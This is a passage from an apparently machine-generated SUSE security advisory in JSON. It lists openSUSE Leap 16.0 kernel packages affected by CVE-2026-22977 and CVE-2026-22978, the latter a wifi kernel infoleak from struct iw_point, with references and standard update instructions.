"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22977"
},
{
"cve": "CVE-2026-22978",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22978"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22978",
"url": "https://www.suse.com/security/cve/CVE-2026-22978"
},
{
"category": "external",
"summary": "SUSE Bug 1257227 for CVE-2026-22978",
"url": "https://bugzilla.suse.com/1257227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
